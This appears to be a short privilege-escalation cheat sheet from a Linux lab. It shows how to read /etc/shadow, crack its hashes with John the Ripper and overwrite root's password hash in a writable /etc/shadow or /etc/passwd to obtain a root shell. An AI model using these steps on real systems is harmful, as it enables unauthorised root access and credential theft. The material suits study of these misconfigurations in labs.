Passswd & shaddow
Weak File Permissions - Readable /etc/shadow
View the contents of the /etc/shadow file
cat /etc/shadow
User's password hash (if they have one) can be found between the first and second colons (:)
john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
Login as root
su root
Weak File Permissions - Writable /etc/shadow
Generate a new password hash with a password of your choice:
mkpasswd -m sha-512 <new-password-here>
Edit the /etc/shadow file and replace the original root user's password hash with the one you just generated.
Login as root
su root
Weak File Permissions - Writable /etc/passwd
The /etc/passwd file contains information about user accounts. It is world-readable, but usually only writable by the root user. Historically, the /etc/passwd file contained user password hashes, and some versions of Linux will still allow password hashes to be stored there.
Generate a new password hash with a password of your choice
openssl passwd <new-password-here>
Edit the /etc/passwd file and place the generated password hash between the first and second colon (:) of the root user's row (replacing the "x")
Login as root
su root